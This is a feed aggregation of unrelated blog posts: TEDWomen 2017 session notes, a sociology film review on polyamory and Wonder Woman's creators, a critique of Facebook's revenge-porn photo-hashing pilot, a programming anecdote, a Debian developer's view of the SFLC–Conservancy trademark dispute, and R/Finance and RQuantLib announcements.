Our hosts for this session, Jean Oelwang and Chris Waddell, are life partners who’ve both had to overcome their inclination to be a solo superhero — to be the best at business, school, sports. Jean spent her career climbing the corporate ladder, being tough, making her way to the top alone. Meanwhile, Chris was a skiier who, early in his own career, faced what could be a devastating setback when his ski popped off during a turn, leaving him paralyzed from the waist down. He went on to become a world-champion monoskier, setting Paralympic history. He kicks off this session with his story of a quest to summit Mt. Kilimanjaro solo on his handcycle. On the way, he found that, maybe, going solo wasn’t the real goal at all. Building from this story, Session 3 unfolds …

Historian of photography Deborah Willis and artist Hank Willis Thomas, sometime collaborators, always mother and son, speak about their intertwined work and lives at TEDWomen 2017. Photo: Stacie McChesney / TED

Love overrules: Deborah Willis and Hank Willis Thomas are photographers. They are also mother and son. Deborah, told by her photography professor that she was intended for motherhood and not the art world, responded by giving birth to Hank, working the pregnancy into her pictures, and launching into a storied career as a photographer, curator and writer. Growing up in a house full of pictures, Hank also picked up a camera early in life. Their subsequent work has always drawn from what they characterize as a symbiotic relationship defined by abiding love. “Through her actions,” Hanks says of his mother, “she has shown me that love is an action, not a feeling … a way of listening and a way of seeing.” Love–as it relates to family, community, race, identity, notions of truth–has remained a throughline that pierces their efforts to highlight stories that diverge from mainstream narratives about black life. Pondering the reason behind her decision to make photography and love the twin foundations of her professional life, Deborah comes to a conclusion: “Because of the lack of images that circulate in the public about black love and black joy.” Watching this duo onstage provides both.

A textbook for racial literacy. Growing up, Winona Guo and Priya Vulchi thought they understood racism. “We had experienced and heard stories about race, about prejudice, discrimination and stereotyping, and we were like, ‘we get it, racism!’” says Vulchi. “But we weren’t even close,” says Guo. The two friends, then seniors in high school, decided they needed to learn more — so they took a trip to collect hundreds of personal stories about race. Using those stories, Guo and Vulchi highlight the two fundamental gaps they discovered in our racial literacy: the heart gap and the mind gap. One, an inability to understand each of our experiences and be compassionate beyond lip service, and the other, an inability to understand the larger systemic ways racism operates. To bridge those gaps, Guo and Vulchi co-created a textbook, The Classroom Index, that pairs personal stories with statistics. “We need to raise the bar, elevate our standards for racial literacy, because without investing in an education that values both the story and the statistic, the people and the numbers, the interpersonal and the systemic, there will always be a piece missing,” they say.

The summer they finished high school, Priya Vulchi and Winona Guo hit the road to explore American attitudes toward racism — and wrote a textbook to help young people like them understand what it really means right now. They speak together at TEDWomen 2017. Photo: Stacie McChesney / TED

The defining moments of our lives. On one awful night, Ples Felix’s grandson, a young teenager, murdered Azim Khamisa’s son, a college student, in a robbery gone wrong, fueled by drugs, alcohol and a false sense of belonging. The deadly encounter of these two young men sent Khamisa and Felix down paths of deep meditation to forgive and to be forgiven — and in act of bravery and reconciliation, the two men met and forged a lasting bond. “Sometimes in deep trauma and deep tragedy, there is a spark,” says Khamisa, in meeting Felix’s grandson, Tony, and connecting with the humanity and humility he witnessed. Together, Khamisa and Felix have used their story as an outline for a better, more merciful society where victims of tragedy can grow with one another and heal — highlighted by the heartfelt news they shared on the TEDWomen stage. As a testament to their enduring relationship and combined efforts to spread the message of peace over the last 12 years, Tony will be released from prison. “Peace is possible,” says Khamisa. “How do I know that? Because I am at peace.”

Sisterhood in three scenes. Felice Belle and Jennifer Murphy, two self-proclaimed sisters in heart and thought, took the TEDWomen stage in a captivating, poetic journey through their friendship. Lives lived apart and together, weaved with laughter and dancing between tragedy and delight, Belle and Murphy lovingly recalled memories and moments that solidified their sisterhood from the day they first became to now. “There are moments that bond,” says Belle. “When there is no train, no car service, no bus, my sister will walk miles just to be by my side.” Together, they recite. “When a sister loves a sister, you listen to her read, thinking: as heaven to the gods is poetry to the beloved.”

Erotic wisdom from the African continent. From our fear of women’s bodies to our sheepishness around the word ‘nipple,’ our ideas about sex need an upgrade, say sex educators (and hilarious women) Tiffany Mugo and Siphumeze Khunday. For a radical new take on sex positivity, the duo took to the TED stage to suggest we look no further than the African continent for erotic wisdom both ancient and modern. For instance, before colonization, certain African societies had sexuality schools that taught social and erotic cues; some even maintained spaces where teenagers could explore their sexual urges and how to handle them. The pair also introduces us to an early Yoruba concept known as Osunality, which affirms the normality of sexual pleasure and the erotic, and which teaches women to brandish their sexuality unselfconsciously. Even in the present tense, say Siphumeze and Tiffany, queer African women who practice kink show us how we can shake off the problematic ideas about sex we’ve internalized, and re-define sex and pleasure on our own terms.

Tiffany Mugo and Siphumeze Khundayi speak to the joy (and occasional comedy) of sex — and ask us to look at some ancient African practices that might help us all get a little better at it. They speak together  at TEDWomen 2017. Photo: Stacie McChesney / TED

The dynamic duo intent on bursting our filter bubbles and bringing us together. Although it sounds like the plot of a rom-com — Republican guy meets liberal woman; sparks fly! — John Gable and Joan Blades have formed a very real friendship that is fostering meaningful exchanges between people from different parties, groups and backgrounds. Gable, who calls himself “a product of small town America, conservative at its heart,” worked in Republican politics before entering the tech world. Alarmed by the filter-bubble phenomenon, he founded AllSides.com, which uses technology to present issues from multiple angles. A Berkeley, California, native and progressive, Blades (who co-founded Moveon.org in 1998) is the co-founder of LivingRoomConversations.org, ​which organizes people to hold small gatherings in their homes to speak to those holding alternate viewpoints. The goal is understanding. “It’s a deep listening practice,” Blades says, “never a debate.” A few years ago, Gable and Blades created AllSidesforSchools.org, which pairs students with their counterparts in other parts of the country and the world. It’s been used in 42 states so far, and after participating, “92 percent of students say they better understood the other student’s side,” reports Gable. Humans have thrived thanks to our ability to collaborate to solve problems. Gable and Blades remind us that as we face our most intractable challenges yet — climate change, poverty, chronic disease — we will only succeed if we listen and learn from each other.

Joan Blades is a lefty; John Gable is … not. But they’re friends, and they can have a conversation about what really matters to them. They speak together at TEDWomen 2017. Photo: Ryan Lash / TED

The power behind the partnership. Our hosts Jean and Chris come back to close the session — and to expand on an idea teased in Jean’s short intro: that partnerships are more powerful than we know. In her work with The Elders, a group of veteran, venerated leaders who advise on world events, she noticed that the great figures she was working with all seemed to have a trusted partner who was that magical combination of supportive and honest. Exploring the relationships of folks like of Jimmy and Roslyn Carter, or Desmond and Leah Tutu, she unpacks the qualities that make a great and productive partnership — which she’s exploring in a new project called Plus Wonder.

In her work with The Elders, pictured behind her, Jean Oelwang became fascinated by how many great people were paired up with an equally great partner — a friend, a spouse, someone who gave them honest answers and helped them be their best. She speaks at TEDWomen 2017. Photo: Ryan Lash / TED


TEDBe fierce, claim power: Notes from Session 5 of TEDWomen: Burn

Singer/songwriter Judith Hill performs “Strange Fruit” to begin Session 5 of TEDWomen 2017, a hard look at hard things. Photo: Stacie McChesney / TED

There’s a theme of Bridges that plays through this conference — and one of the things we sometimes need to do with bridges is burn them, to move forward with no option of going backward in time or space. In this session, hosted by documentary film aficionado Jess Search, we listen to hard truths about taking the steps we need to take — without looking back.

In her day job, Jess Search supports documentary filmmakers as head of the Doc Society. She brings that same curious eye to her job this week: hosting Thursday evening’s session of TEDWomen 2017. Photo: Ryan Lash / TED

A strange and bitter crop. The session begins with Judith Hill’s richly textured performance of “Strange Fruit,” a protest song made famous by Billie Holliday. Contrasting traditional Deep South imagery of magnolia blossoms and gentle breezes with the brutal legacy of lynching, the lyrics drive home the still-unexamined history of racial terrorism in the 20th-century American South: “Southern trees bear strange fruit / Blood on the leaves and blood at the root / Black bodies swinging in the southern breeze / Strange fruit hanging from the poplar trees.”

When Gretchen Carlson reported her own sexual harassment at work, it sparked an outpouring of thousands of women’s stories — and inspired her to speak up even more to create safer places to work. She speaks at TEDWomen 2017 in New Orleans. Photo: Stacie McChesney / TED

We have to be fierce. Gretchen Carlson is a veteran TV journalist and host who won the title of Miss America in the late ’80s, representing her home state with a smile and a plan to land a dream job in media. But again and again in her year wearing the crown, this young woman encountered men who pushed unwanted sexual advances on her: the TV executive who stuck his tongue down her throat; the LA publicist who grabbed her by the neck in a car backseat. “Only recently did I realize these incidents weren’t just harassment – they were assault,” she says now. “But like so many survivors, I thought: ‘I’ve got this. I’m okay. Just move on, Gretchen.'” Fast-forward to 2016, when her story of workplace harassment at Fox News broke. It was one of the scariest days of her life — but it also brought an outpouring of women’s stories, a flood of honesty that inspired her to do more and has led to her new book. Onstage, she lays out three things we can all do to create safer places to work — from acting as allies to fighting against binding arbitration clauses in workplace contracts. Because here’s the breaking news, “the untold, shocking truth about women and sexual harassment: Women want to work in a safe, welcoming and harassment-free environment,” she says. A pause. “That’s it.”

Tribal attorney Tara Houska holds a piece of her cultural history — a rattle used in sacred ceremonies — while talking about the kids in the slide behind her, the Native American kids who are one of the fastest-growing new demographics in the US. Can we make life better for these kids? She speaks at TEDWomen 2017 in New Orleans. Photo: Ryan Lash / TED

We are resilient. We are fierce. We are still here. “When you aren’t viewed as real people, it’s a lot easier to run over your rights,” says tribal attorney Tara Houska. As part of the bear clan from Couchiching First Nation in International Falls, Minnesota, she’s watched and experienced countless attempts to eradicate the legitimacy of her land, her people and her culture — the most recent instance being the months-long standoff at Standing Rock that resonated and rallied thousands around the world. Through systemic ignorance, violence, genocide and disregard of treaty agreements — often by governments themselves — native peoples are constantly fighting an uphill battle for fundamental rights. So let’s start addressing that ignorance, Houska suggests. Currently, there are 567 federally recognized tribes in the US alone, yet only half of all US schools mention more than a single tribe in textbooks. Education is fundamental, she says: “Change the narrative and grow. Empathize. Support. Remember we are as human beings living on this earth together. “

Mwende “FreeQuency” Katwiwa blends a poem about reproductive justice with a thoughtful discussion of Black Lives Matter — because, as she says, it is impossible to separate the two issues. She speaks at TEDWomen 2017. Photo: Ryan Lash / TED

It is the artist’s job to unearth the story that other people try to bury, says Mwende “FreeQuency” Katwiwa. In a gut-wrenching, incisive talk-plus-poetry, she considers reproductive justice in America for black mothers through a poem called “The Joys of Motherhood,” which begins: “I don’t know if I have what it takes to stomach motherhood in this country.” In a world with true reproductive justice, everyone would be able to parent in safe, socially supportive environments, in healthy communities without fear of violence. But America makes no such guarantees for black mothers and their babies. As Mwende says, “[America] has taught me how some women give birth to babies and others to suspects / has taught me that this body will birth kin who are more likely to be held in prison cells than to hold college degrees.” She continues, “there is something about being black in America that has made motherhood sound like mourning.” Mwende ends the talk with a bold call to unite the reproductive justice movement with Black Lives Matter — in fact, she says, it is impossible to separate them.

Who are we without labels? Clemantine Wamariya grew up in Kigali, Rwanda, but when she was six, she was forced to flee genocide with her sister Claire. “You go from a person who’s away from home to a person with no home,” she says. “The place that’s supposed to want you has pushed you out, and no one takes you in. You are unwanted by anyone. You are a refugee.” Eventually, Clemantine and Claire came to the United States … and in a truly American twist, they were reunited with their parents live on Oprah. But her family still rarely speaks about the past. “None of us can make sense of what happened to us,” she says. Rwanda, she reminds us, is not the only country where people have turned on each other. “In order for us to stop the violence that goes on in the world, I beg you to pause. Let’s ask ourselves, who are we without words, who are we without labels? Who are we in our breath? Who are we in our heartbeat?”

Justin Baldoni shares his adventures on Instagram, where his posts about exercise draw male fans, while his posts about loving his wife and parenting his kid speak to women. He wondered: Why is that? He speaks at TEDWomen 2017. Photo: Ryan Lash / TED

Taking the TED stage as himself, not as one of the many fictional men he has played, the actor, filmmaker, and social entrepreneur Justin Baldoni invites men to reject traditional norms of masculinity, to be accountable for and conscious of their actions — and to be vulnerable, express emotions, and disrupt the patriarchy. “I believe the only way that can happen,” he says, “is if men learn to not only embrace the qualities we’ve been told are “feminine” in ourselves, but to be willing to stand up, champion, and learn from the women who embody them.” And, sometimes, he adds, that means having to “shut up and listen.” As a proud feminist, Baldoni understands the privileged space he occupies within society and advocates for action-based activism. “As men, it’s time that we start to see past our privilege and recognize that we are not just part of the problem. Fellas: we are the problem. The glass ceiling exists because we put it there,” he says, “and if we want to be part of the solution, then words are no longer enough.”

“I was a bully.” This powerful admission early in Sally Kohn‘s talk hits hard. She’s always been told she was a nice person who gets along with all types of people, but the political pundit was haunted by a memory from grade school of mercilessly bullying another kid, with cruel words that stayed fresh in her mind long after every other fact about fifth grade was forgotten. That memory, along with a noticeable increase in recent hateful thoughts in the world at large, made her question the way people described her and even how she thought of herself: “What if I wasn’t a nice person at all — but really just a hateful monster?” She wanted to understand this early episode of bullying in her life within the broader context of hate and its growing influence in the world, and she began to ask questions. One serious truth she found as she literally wrote a book about hate (“Spoiler: I’m against it”): It isn’t enough to fight against big hateful expressions and actions, but also the small, everyday ones too.

In confronting her own history as a bully, Sally Kohn examines the continuum of hate — and finds that even the smallest act can be part of that continuum. On the other hand, she says, change is possible. She speaks at TEDWomen 2017. Photo: Stacie McChesney / TED


TEDA glimpse of a bold new future: Notes from Session 2 of TEDWomen 2017: Design

Host Alaa Murabit, a physician and activist, spoke at TEDWomen in 2015; she returns now in 2017 to host a bold session about design of all kinds, from medical breakthroughs to the simple dignity of bring true to yourself. Photo: Ryan Lash / TED

Up bright and early in the Big Easy, and right back into the TEDWomen program, with a session hosted by physician and UN High Commissioner (and a past TEDWomen speaker herself) Alaa Murabit, who confesses that she was pleasantly confused to find herself helming a session featuring all things design. “I always thought design was about externally pleasing aesthetics,” she said, confessing that her own design skills are … limited. “But what you’ll learn from speakers in this session is that design isn’t just about how great something looks — but how well it works.” Ready? Ready:

How do you design for the wonders of science? Growing up, neuroscientist-turned-designer Amanda Phingbodhipakkiya watched how her father would encourage diners in his Thai restaurant to embrace the unfamiliar. Now, she applies this same spirit to science activism, attempting to “introduce the wonder and humanity of science to the world, just like my dad introduced Thai food to our neighbors.” Her own experiments so far have resulted in creating Beyond Curie, a series of illustrations highlighting historical badass women in STEM and a scientifically rigorous, yet visually compelling pop-up science museum for adults. Most recently, she started a fashion line and community for women and girls to express their love of science — and find each other in the process.

Giving new meaning to remote work. “We’re just getting inside the joint now,” says Nadine Hachach-Haram as she peers into her laptop. She’s not kidding — she’s helping a surgeon based in Minnesota to drill into a patient’s knee, using her webcam to provide direction and feedback on what he should do next. Remote, collaborative surgeries like this, she says, can provide the next wave of surgical innovation, likely to have as dramatic an impact on humanity as the discovery of antiseptic or the use of robotics in the operating room. With her system, called Proxima, an experienced surgeon can advise another surgeon on a procedure, live, using AR and a laptop camera. It’s early days, but the hope is to provide a lifeline for the 5 billion people who lack access to safe surgical care. Says one mother whose child received cleft palette surgery in her Peruvian village, directed by a surgeon in California, “this technology gave my daughter her smile.”

Born to invent. In 2016 Anushka Naiknaware of Portland, Oregon, became the youngest winner — at age 13 — of the Google Science Fair when she designed a sensor that tracks wound healing. Driven by a fascination about how the world worked, she learned about  wounds that don’t heal normally due to preexisting conditions such as diabetes — and was shocked by their prevalence and cost ($50 billion worldwide in 2010). Since there’s a correlation between the moisture level of a wound and its stage of healing, Naiknaware worked in her garage to combine materials science, fractal math and biology to create a sensor that wirelessly delivers wound information to both patient and doctor. Did we mention she was 13 when she did this? But Anushka says she’d rather people be inspired by her story to make their own difference.

Young iventor Anushka Naiknaware has a passion to solve problems and to learn as much as she can about everything possible. She speaks at TEDWomen 2017: Bridges, on November 2, 2017, at the Orpheum Theatre in New Orleans. Photo: Ryan Lash / TED

Be true to yourself. Asali DeVan Ecclesiastes is a writer and activist who comes to the stage with a powerful poem about our self and our world — and the struggle to bring our true selves to everything we do. Two excerpts from her poem, Chasms:

there are some chasms
so deep and so wide
it’s hard to imagine how we make it
safely to the other side
that space between who we are
and who we want to be
the gaps that separate our high ideals
from our base realities
the distance between what we say
and what we really mean

we often find ourselves
fighting hard in the paint
to hold onto images of what we ain’t
so while our dreams coincide
our fears collide
and we want to know one another
but think we can’t

Asali DeVan Ecclesiastes speaks her powerful poem Chasms to an enrapt audience at TEDWomen 2017. Photo: Stacie McChesney / TED

The power of physical exercise. Neuroscientist Wendy Suzuki was working on the study of memory, but after she signed up at a gym and noticed improvement in her own memory and focus, she realized she had to switch her focus: now, she researches the impact of exercise on the brain, and she’s found some surprising stuff. Her work and the work of others has shown that exercise transforms your brain in three primary ways. First, it increases levels of neurotransmitters that affect your mood. Second, over the long term, exercise actually changes the brain’s anatomy, physiology and function. And finally, it helps protect your brain from neurodegenerative diseases as you age. So how often do you have to exercise to get these benefits? Suzuki says you’ve got to get your heart rate pumping three or four times a week for 30–45 minutes each time. Good news: Aerobic vacuuming totally counts.

Wendy Suzuki studies how regular exercise affects the brain in three important ways. She speaks at TEDWomen 2017: Bridges, in New Orleans. Photo: Ryan Lash / TED

Everyone, everywhere deserves good design. If architect and writer John Cary has his way, women will never need to stand in pointlessly long bathroom lines again. He points to these lines as “representative of a more serious issue”: the lack of diversity in design that leads to thoughtless, compassionless spaces. “Design has a unique ability to dignify. It can make people feel valued, respected, honored and seen,” he says. The flip side is true, too, and those bathroom lines tell women their needs were not considered when these rooms were created. Design is a white male-dominated profession, Cary notes: only 15 percent of registered architects in the US are women; a far lower percentage are non-white. He calls for the architecture and the design professions to expand their ranks and commit to serving the public good, not just the privileged few. “Well-designed spaces are not just a matter of space or a question of aesthetics,” he says. “They literally shape our ideas of who we are in the world and what we deserve.” We all deserve better.


Sociological ImagesThank you, Angela Robinson: A Review Of Professor Marston and The Wonder Women

Originally Posted at Marx in Drag

I have been interested in and reading about the creators of the comic book super hero Wonder Woman for a few years now. My interest began in 2014.

I was half-heartedly listening to Fresh Air with Terry Gross, and Gross was interviewing historian Jill LePore, the author of The Secret History of Wonder Woman. At the time, I hadn’t read LePore’s book or the Wonder Woman comics, and so I was mildly but not wildly interested in their conversation. When Gross asked LePore to talk about William Marston’s family life, LePore began to describe the relationship between Marston, Elizabeth Holloway, Marston’s wife, and Olive Byrne, the woman who lived with them and was, in Terry Gross’s words, Marston’s “mistress.”

Holy shit!, I said to myself. These people were polyamorous! Of course, I knew that they couldn’t have seen themselves as “polyamorous” in the contemporary sense of the word, for the word would not be invented for another fifty years or so after Marston and Holloway invited Byrne into their relationship. However, it sounded to me like they were doing something akin to a poly relationship—as in they had chosen to forge an intimate relationship that included more than two people, and they had built a life together.

In a word, I was hailed. I felt a sense of connection to Holloway, Byrne, and Marston—dare I say queer kinship. I am poly and so were these people from almost a century ago. These are my people! And here were Terri Gross and Jill Lepore talking about it on the usually rather conventional National Public Radio. This doesn’t happen often, so I stopped what I was doing and turned up my radio.

After LePore described the relationship between Holloway, Byrne, and Marston, Terri Gross said, “That’s just so bizarre.” And LePore agreed, “Yeah. It’s so bizarre…hilariously bizarre.”

My bubble burst. Instead of being hailed, I felt slapped in the face. I don’t know what Gross’s or LePore’s relationship history looks like, but they certainly sounded like monogamists looking in at us poly freaks from the outside, and they were calling us bizarre and laughing at us. A much too common experience.

That is why Angela Robinson’s film, Professor Marston and The Wonder Woman, is the real breath of Fresh Air.

I’ll be honest, I went to this film with some trepidation. I wanted to believe I wouldn’t be mocked or depicted as a bizarre spectacle given Angela Robinson’s resume, but polyamory? Between a man and two women? With kink? It would be very easy for Robinson to spill this very tall order.

I was worried that it wouldn’t do justice to just how unconventional the Marstons were. I was concerned it would perpetuate stereotypes about polygamy–dominant, selfish, and exploitive yet lucky (wink wink) men have multiple and suffering wives. I read LePore’s book, and as I write in my forthcoming book, The Poly Gaze, she often interprets the Marston family through this lens. I also didn’t want to see yet another film about a man with a wife and mistress and the bitter, catty, and destructive rivalry between the women.

Though understandable given the lack of feminist and/or queer representations of threesomes or poly triads in mainstream media, my fears and worries turned out to be completely unfounded. Rather than make a spectacle out of the perverts or freaks, Robinson adeptly turns the tables and asks the viewer to question their own assumptions about what is normal. It renders polyamory possible and highlights the dire social sanctions that often come with not living within the boundaries of monogamy. The film also offers a truly rare representation of sexual threesomes as a loving and sexy way to forge intimate bonds, and presents BDSM as a component of healthy relationships rather than a result of psycho-pathology or sexual trauma (think Fifty Shades of Gray).

All of this is rather groundbreaking, and I was, quite literally, in tears as I watched. Tears of joy and relief for being hailed as polyamorous, an enthusiastic participant in threesomes, and a dabbler in kink and not getting slapped in the face with mocking laughter or the pointing fingers of shame.

But these things were not, for me personally, the most unique and striking aspect of this film—though, to be perfectly clear, I do not want to diminish just how significant this film is in its bravery and beauty around polyamory, bisexuality, and kink. The most astonishingly wonderful thing about Angela Robinson’s film version of this story, as seen from my theatre seat, was being hailed as a feminist. Gazing at Elizabeth and Olive admire, fall in love with, and express desire for each other as lovers, not rivals. And even more significant was to witness them consciously and deliberatively (not deliberately, though that works too) choose to forge an unconventional and poly life together with Marston.

Unlike narratives about polygamy where women are passive objects of men’s brutality or desire, this film shows Elizabeth and Olive actively creating a life together and with a man who is an equal partner. Refusing to reproduce tropes about women’s competition with each other for the attention of a man, Angela Robinson situates the women’s admiration and desire for each other at the center of the story. Both women are brilliant feminists. And both women are, as Olive says about Elizabeth, ‘magnificent” and desirous of an unconventional life.

In other words, Angela Robinson has succeeded in transforming a story about a man with a wife and a mistress (as told by Gross and LePore) into two women and a man who bravely forge an unconventional, poly and feminist life.

Whether or not it is an accurate portrayal of the lived experience of Holloway, Byrne, and Marston is impossible to know, and to be perfectly frank, completely uninteresting to me. I am interested in the stories we tell—as historians and as filmmakers and what those stories say about people who live unconventional lives.

I cherish the story told in this film by Angela Robinson because of what it says about those of us who live unconventional, poly lives. Yes, we are freaks, but only in the eyes of those who live conventional lives and want everyone else to follow the rules. Yes, we are sometimes ridiculed and shunned, and yet, because of it, we are brave, strong, and resilient. And some of us, like Elizabeth Holloway, Olive Byrne, and William Marston, and the character Wonder Woman, for that matter, are capable of changing the world. Thank you, Angela Robinson, for telling this part of the story.

Mimi Schippers is an Associate Professor of Sociology and Gender and Sexuality Studies at Tulane University. She is the author of Beyond Monogamy: Polamory and the Future of Polyqueer Sexualities  (New York University Press, 2016) and Rockin’ Out of the Box: Gender Maneuvering in Alternative Hard Rock (Rutgers University Press, 2002).  

(View original at https://thesocietypages.org/socimages)

CryptogramFacebook Fingerprinting Photos to Prevent Revenge Porn

This is a pilot project in Australia:

Individuals who have shared intimate, nude or sexual images with partners and are worried that the partner (or ex-partner) might distribute them without their consent can use Messenger to send the images to be "hashed." This means that the company converts the image into a unique digital fingerprint that can be used to identify and block any attempts to re-upload that same image.

I'm not sure I like this. It doesn't prevent revenge porn in general; it only prevents the same photos being uploaded to Facebook in particular. And it requires the person to send Facebook copies of all their intimate photos.

Facebook will store these images for a short period of time before deleting them to ensure it is enforcing the policy correctly, the company said.

At least there's that.

More articles.

EDITED TO ADD: It's getting worse:

According to a Facebook spokesperson, Facebook workers will have to review full, uncensored versions of nude images first, volunteered by the user, to determine if malicious posts by other users qualify as revenge porn.

Worse Than FailureTheory Versus Reality

I went to college at the State University of New York at Albany, where back then, most of the Computer Science curriculum courses were entitled Theory of xxx. The programming assignments were the usual small-scope demonstrations of some feature of programming, typically something an experienced developer would code in 15-20 LOC.

My Masters project was to modify the TeX typesetting system (by Knuth) to leverage the more advanced features of a new typesetting system. It took me about two months to reverse engineer it only to find that the entire required modification amounted to a single character change.

Albert Einstein c1890s

The theory sunk in, but there was no practical application of it to reality.

Fast forward to my first programming job, where one of my tasks was to write a stand alone program that would read connection names from a file, verify that they were valid, and use them for something. There were about 350 different connection names, but they didn't follow any discernible pattern. There were a variety of letters and numbers in no particular ordering. However, there was a lot of substring duplication within the names.

Being a clueless but diligent noob, it dawned on me that I could leverage those semi-duplications so I wrote a huge progressive if-then-else statement to determine whether a name was valid.

For example, the list contained names like:

   AXLP1122
   AXLP1133
   BCXQ5566
   BCYZ7788

The code was in FORTRAN IV, so I'll just use pseudo code here. The logic for that little sub list looked like this:

   if (name.startsWith("AXLP11"))
      if (name.substring(6) = "22 or name.substring(6) = "33")
          name is valid
   else if (name.startsWith("BC")
      if (name.substring(2) = "XQ5566" or name.substring(2) = "YZ7788")
          name is valid
   else ...

This proceeded to about 5 levels deep and comprised several hundred lines of code. I even built a test case to verify every single one of the names.

Then I proudly turned it in to my boss, who instantly proceeded to laugh in my face. He pointed out that it would take forever to run through all of that logic for each of the millions of records (back then, the CPUs ran at a little below 4MHz with very little RAM), and that perhaps I should consider using an array and a binary search lookup.

It was at that moment that I realized the fallacy of taking only courses entitled Theory of xxx, that perhaps my college tuition didn't buy me all I had hoped, and started a years-long effort to learn Practical Application of xxx to make myself better at what I did.

[Advertisement] Manage IT infrastructure as code across all environments with Puppet. Puppet Enterprise now offers more control and insight, with role-based access control, activity logging and all-new Puppet Apps. Start your free trial today!

,

Planet DebianNeil McGovern: Software Freedom Law Center and Conservancy

Before I start, I would like to make it clear that the below is entirely my personal view, and not necessarily that of the GNOME Foundation, the Debian Project, or anyone else.

There’s been quite a bit of interest recently about the petition by Software Freedom Law Center to cancel the Software Freedom Conservancy’s trademark. A number of people have asked my views on it, so I thought I’d write up a quick blog on my experience with SFLC and Conservancy both during my time as Debian Project Leader, and since.

It’s clear to me that for some time, there’s been quite a bit of animosity between SFLC and Conservancy, which for me started to become apparent around the time of the large debate over ZFS on Linux. I talked about this in my DebConf 16 talk, which fortunately was recorded (ZFS bit from 8:05 to 17:30).

 

This culminated in SFLC publishing a statement, and Conservancy also publishing their statement, backed up by the FSF. These obviously came to different conclusions, and it seems bizarre to me that SFLC who were acting as Debian’s legal counsel published a position that was contrary to the position taken by Debian. Additionally, Conservancy and FSF who were not acting as counsel mirrored the position of the project.

Then, I hear of an even more confusing move – that SFLC has filed legal action against Conservancy, despite being the organisation they helped set up. This happened on the 22nd September, the day after SFLC announced corporate and support services for Free Software projects.

SFLC has also published a follow up, which they say that the act “is not an attack, let alone a “bizarre” attack“, and that the response from Conservancy, who view it as such “was like reading a declaration of war issued in response to a parking ticket“. Then, as SFLC somehow find the threat of your trademark being taken away as something other than an attack, they also state: “Any project working with the Conservancy that feels in any way at risk should contact us. We will immediately work with them to put in place measures fully ensuring that they face no costs and no risks in this situation.” which I read as a direct pitch to try and pull projects away from Conservancy and over to SFLC.

Now, even if there is a valid claim here, despite the objections that were filed by a trademark lawyer who I have a great deal of respect for (disclosure: Pam also provides pro-bono trademark advice to my employer, the GNOME Foundation), the optics are pretty terrible. We have a case of one FOSS organisation taking another one to court, after many years of them being aware of the issue, and when wishing to promote a competing service. At best, this is a distraction from the supposed goals of Free Software organisations, and at worst is a direct attempt to interrupt the workings of an established and successful umbrella organisation which lots of projects rely on.

I truly hope that this case is simply dropped, and if I was advising SFLC, that’s exactly what I would suggest, along with an apology for the distress. Put it this way – if SFLC win, then they’re simply displaying what would be viewed as an aggressive move to hold the term “software freedom” exclusively to themselves. If they lose, then it shows that they’re willing to do so to another 501(c)3 without actually having a case.

Before I took on the DPL role, I was under the naive impression that although there were differences in approach, at least we were coming to try and work together to promote software freedoms for the end user. Unfortunately, since then, I’ve now become a lot more jaded about exactly who, and which organisations hold our best interests at heart.

(Featured image by  Nick Youngson – CC-BY-SA-3.0 – http://nyphotographic.com/)

Planet DebianDirk Eddelbuettel: R / Finance 2018 Call for Papers

The tenth (!!) annual annual R/Finance conference will take in Chicago on the UIC campus on June 1 and 2, 2018. Please see the call for papers below (or at the website) and consider submitting a paper.

We are once again very excited about our conference, thrilled about who we hope may agree to be our anniversary keynotes, and hope that many R / Finance users will not only join us in Chicago in June -- and also submit an exciting proposal.

So read on below, and see you in Chicago in June!

Call for Papers

R/Finance 2018: Applied Finance with R
June 1 and 2, 2018
University of Illinois at Chicago, IL, USA

The tenth annual R/Finance conference for applied finance using R will be held June 1 and 2, 2018 in Chicago, IL, USA at the University of Illinois at Chicago. The conference will cover topics including portfolio management, time series analysis, advanced risk tools, high-performance computing, market microstructure, and econometrics. All will be discussed within the context of using R as a primary tool for financial risk management, portfolio construction, and trading.

Over the past nine years, R/Finance has includedattendeesfrom around the world. It has featured presentations from prominent academics and practitioners, and we anticipate another exciting line-up for 2018.

We invite you to submit complete papers in pdf format for consideration. We will also consider one-page abstracts (in txt or pdf format) although more complete papers are preferred. We welcome submissions for both full talks and abbreviated "lightning talks." Both academic and practitioner proposals related to R are encouraged.

All slides will be made publicly available at conference time. Presenters are strongly encouraged to provide working R code to accompany the slides. Data sets should also be made public for the purposes of reproducibility (though we realize this may be limited due to contracts with data vendors). Preference may be given to presenters who have released R packages.

Please submit proposals online at http://go.uic.edu/rfinsubmit. Submissions will be reviewed and accepted on a rolling basis with a final submission deadline of February 2, 2018. Submitters will be notified via email by March 2, 2018 of acceptance, presentation length, and financial assistance (if requested).

Financial assistance for travel and accommodation may be available to presenters. Requests for financial assistance do not affect acceptance decisions. Requests should be made at the time of submission. Requests made after submission are much less likely to be fulfilled. Assistance will be granted at the discretion of the conference committee.

Additional details will be announced via the conference website at http://www.RinFinance.com/ as they become available. Information on previous years'presenters and their presentations are also at the conference website. We will make a separate announcement when registration opens.

For the program committee:

Gib Bassett, Peter Carl, Dirk Eddelbuettel, Brian Peterson,
Dale Rosenthal, Jeffrey Ryan, Joshua Ulrich

Planet DebianDirk Eddelbuettel: RQuantLib 0.4.4: Several smaller updates

A shiny new (mostly-but-not-completely maintenance) release of RQuantLib, now at version 0.4.4, arrived on CRAN overnight, and will get to Debian shortly. This is the first release in over a year, and it it contains (mostly) a small number of fixes throughout. It also includes the update to the new DateVector and DatetimeVector classes which become the default with the upcoming Rcpp 0.12.14 release (just like this week's RcppQuantuccia release). One piece of new code is due to François Cocquemas who added support for discrete dividends to both European and American options. See below for the complete set of changes reported in the NEWS file.

As with release 0.4.3 a little over a year ago, we will not have new Windows binaries from CRAN as I apparently have insufficient powers of persuasion to get CRAN to update their QuantLib libraries. So we need a volunteer. If someone could please build a binary package for Windows from the 0.4.4 sources, I would be happy to once again host it on the GHRR drat repo. Please contact me directly if you can help.

Changes are listed below:

Changes in RQuantLib version 0.4.4 (2017-11-07)

  • Changes in RQuantLib code:

    • Equity options can now be analyzed via discrete dividends through two vectors of dividend dates and values (Francois Cocquemas in #73 fixing #72)

    • Some package and dependency information was updated in files DESCRIPTION and NAMESPACE.

    • The new Date(time)Vector classes introduced with Rcpp 0.12.8 are now used when available.

    • Minor corrections were applied to BKTree, to vanilla options for the case of intraday time stamps, to the SabrSwaption documentation, and to bond utilities for the most recent QuantLib release.

